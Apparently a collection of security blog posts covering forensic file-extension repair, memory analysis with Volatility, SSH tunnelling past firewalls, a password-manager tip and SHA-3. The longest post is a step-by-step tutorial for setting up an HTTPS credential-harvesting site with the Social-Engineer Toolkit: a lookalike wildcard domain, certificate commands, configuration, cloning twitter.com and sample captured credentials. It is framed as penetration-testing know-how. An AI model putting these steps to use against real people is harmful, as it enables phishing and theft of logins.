Sometimes when we are carving files out of a harddrive image or pulling them out of a network trace the extensions get messed up or stripped completely.

I wrote this python script to correct wrong or missing extensions. It uses libmagic to identify the mime type of a file, checks apache’s mime.types file to verify that the extension is correct. If there is no extension, or the extension is incorrect, the script will change it.

The script is real-extensions.py:
https://dl.dropboxusercontent.com/u/11061846/real-extension.py
It ties into libmagic via the python-magic wrapper:
https://github.com/ahupp/python-magic
You will also need the apache mime.types file:
http://svn.apache.org/viewvc/httpd/httpd/branches/2.2.x/docs/conf/mime.types?revision=1301896&view=co

Usage: real-extension.py /path/to/files/ /path/to/mime.types

Here’s a great tip from Greg Chetrick.

Tunneling SSH over tcp/443 is a common trick. Most firewalls allow 443 outbound through their firewall, however some IPS and proxy devices are able to detect that the 443 traffic is SSH rather than SSL. This gives them the ability to drop the traffic and kill your tunnel.

Greg’s idea is to tunnel SSH over SSL using Stunnel. Simple. Easy. Quite nice.

My talk at DC404 on Memory Analysis with Volatility. Keep in mind that DC404 is held in the back room of Manuels’s Tavern in Atlanta so please expect waitstaff, drinking and eating along with the security. Thanks Taylor!

I gave a short presentation yesterday on basic memory analysis using the Volatility framework at the monthly DC404 meeting.

The memory sample we used can be downloaded from the amazing Honeynet Project. You can get a copy of the memory sample here. WARNING: It will (should) trigger your AV as there is malware embedded in the memory sample. However there is little risk of infecting yourself as you’d have to extract and then execute the malware.

I used volatility 2.3-alpha for the presentation. You can download it via svn checkout using the following:

svn checkout http://volatility.googlecode.com/svn/trunk/ volatility-dc404

For some of the plugins you will also need Distorm (disassemby library), Yara (malware scanner), Pycrypto (crypto library), and PIL (Python Imaging Library).

Here is the presentation slide deck

And here is the presentation worksheet

Finally, the volatility crew published a useful cheat sheet that you can download from here.

Automater.py is a cool little python script that will check on IP / URL reputation. It will take an IP or hostname either individually or as a list. It then checks it against various reputation sites like ipvoid.com . It will also expand short urls like the ones that come in spam and tweets.

Are you using a password manager like KeePass or LastPass? The benefit of these managers is that you don’t need to remember your passwords directly. This gives you the ability to maintain longer, stronger passwords that can be changed more frequently. Of course the risk is that the main password you use for the password management tool is now the keystone for all of your authentication. If that one master password is guessed or cracked, all of your passwords are cracked.

To help minimize that risk pick a short string that is part of each password but left out of the password manager. The string is added back to the password during the authentication process.

For instance you might pick the string “H8r!” which will be added to the third place of every password. When you copy/paste or autofill a password from the password manager just put my cursor to the third place and re-add the string.

Now if my password manager does get breached there is still one more stumbling block before those passwords are useful.

The Social-Engineer Toolkit, commonly known as SET, was created by Dave Kennedy. It is a python based framework for a variety of tools centered around social engineering attacks.

A common SET technique is to use it to clone a website to socially engineer a user into installing malware or to grab their credentials. These client side attacks rely on enticing the target to click on a link.

These types of attacks can often build a better trust relationship with the target by adding in SSL and using https rather than straight http to perform the attack.

Setting this up with SET is not the most intuitive thing, but is actually quite easy to do.

-=-=-=-=-=-=-=-=-=-=-=-

1) Register a domain name for social engineering

The first step is to register a domain name for use with a social engineering attack. The first method is to pick one specific to each job. For instance if we were hired to target company.com we might pick pany.com so we could create the domain com.pany.com. We might also pick a “typo squat” copy like conpany.com or add on to the existing domain like company-llc.com.

The other method is to register a flexible domain name that can be used in multiple situations. For instance we will be using account-verify.com. This will allow us to create domains like facebook.account-verify.com or google.account-verify.com.

-=-=-=-=-=-=-=-=-=-=-=-

2) Pick a CA for your SSL certificate

After you register the domain name, you need to pick a Certificate Authority (CA) to sign your SSL certificate. The CA is the root of trust (insomuch as they can be trusted.) They sign your certificate to say it is valid. Of course they charge for this.

Common CAs include Comodo, Trustwave, Entrust, Thawte and lots of resellers that can cut you a good deal. SSL shopper does a pretty good job of tracking deals on certificate signing.

For our domain, account-verify.com, we will register for a wildcard certificate. A wildcard domain allows us to get one certificate for *. account-verify.com which will be valid for any host on account-verify.com

With a wildcard certificate we can create valid links for domains like:

https://twitter.account-verify.com or
https://linkedin.account-verify.com

It’s more expensive than a straight domain registration but can be very useful. NOTE: wildcard domain certificates only work to one level above the TLD. In other words:

https://twitter.account-verify.com will work, but
https://www.twitter.account-verify.com will give a domain name mismatch.

If you are planning on a single use domain like company-llc.com it is much cheaper to register for a certificate for a single host like www.company-llc.com

-=-=-=-=-=-=-=-=-=-=-=-

3) Generate your SSL key pair

After we decide on a CA we will need to generate a public/private key pair using openssl.We will use our public key as a certificate signing request or CSR.

We will need openssl to use the following command (all on one line. wrapped for readability):

$ openssl req -nodes -newkey rsa:2048 -keyout STAR_account-verify_com.key 
     -out STAR_account-verify_com.csr

Country Name (2 letter code) [AU]:   US
State or Province Name (full name) [Some-State]:   New York
Locality Name (eg, city) []:NYC
Organization Name (eg, company) [Internet Widgits Pty Ltd]:   FakeCo, Ltd
Organizational Unit Name (eg, section) []:
Common Name (eg, YOUR name) []:   *.account-verify.com
Email Address []:

$ openssl x509 -inform der -in certificate.der -out certificate.pem

$ mv STAR_account-verify_com.key STAR_account-verify_com-key.pem
$ mv STAR_account-verify_com.crt STAR_account-verify_com.pem

set/config/set_config

WEBATTACK_SSL=ON

SELF_SIGNED_CERT=OFF

PEM_CLIENT=/full/path/to/STAR_account-verify_com.pem # Your signed certificate

PEM_SERVER=/full/path/to/STAR_account-verify_com-key.pem # Your private key

$ ./set

   1) Social-Engineering Attacks

   2) Website Attack Vectors

   3) Credential Harvester Attack Method

   2) Site Cloner

set:webattack> IP address for the POST back in Harvester/Tabnabbing: account-verify.com

set:webattack> Enter the url to clone:  https://twitter.com

[*] Cloning the website: https://twitter.com
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.

[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 443
[*] Information will be displayed to you as it arrives below:

c-10-2-3-4.hsd1.ga.comcast.net - - [27/Nov/2012 22:42:49] "GET / HTTP/1.1" 200 -

----------------------------------------

[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: session[username_or_email]= test@blah.com
POSSIBLE PASSWORD FIELD FOUND: session[password]= TestingHTTPSonSET
PARAM: return_to_ssl=true
POSSIBLE USERNAME FIELD FOUND: redirect_after_login=/
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.

Here is the presentation I gave today at the GA ISSA conference in Atlanta. Thanks for everyone that showed up so early.

https://docs.google.com/open?id=0B8P9Y_HwrsxnWEFNN25vNTd3V0U

In the case of your internet access failing you can still get and send short emails to family/friend, follow emergency posts on Facebook and post and follow any Twitter feed all via SMS.

Buzzfeed has a great article on how.

NIST has selected Keccak (pronounced “catch-ack”) as the newest hashing algorithm standard, SHA-3. Keccak is a “sponge” algorithm that “absorbs” data and “squeezes” out a hash anywhere from 224 through 512 bits in length. It also allows for prepending a key or salt to the input message prior to hashing. Everything from a “nutshell” description to the full standard can be found over on the authors’ website: http://keccak.noekeon.org/

There is the question as to whether SHA-3 is even necessary. The SHA-2 Family includes 224, 256, 384 or 512 bit digests (SHA-224 -> SHA512) and has held up extremely well despite some security scares along the way. SHA-512 looks solid for the foreseeable future.

Still, Keccak provides a safety net in case vulnerabilities are found in SHA-2. It also sounds as if Keccak’s flexible and compact design give it better resource utilization. Regardless, as a crypto-geek these NIST contests fascinate me.

You can download the KeccakTools (even a Python port) over here.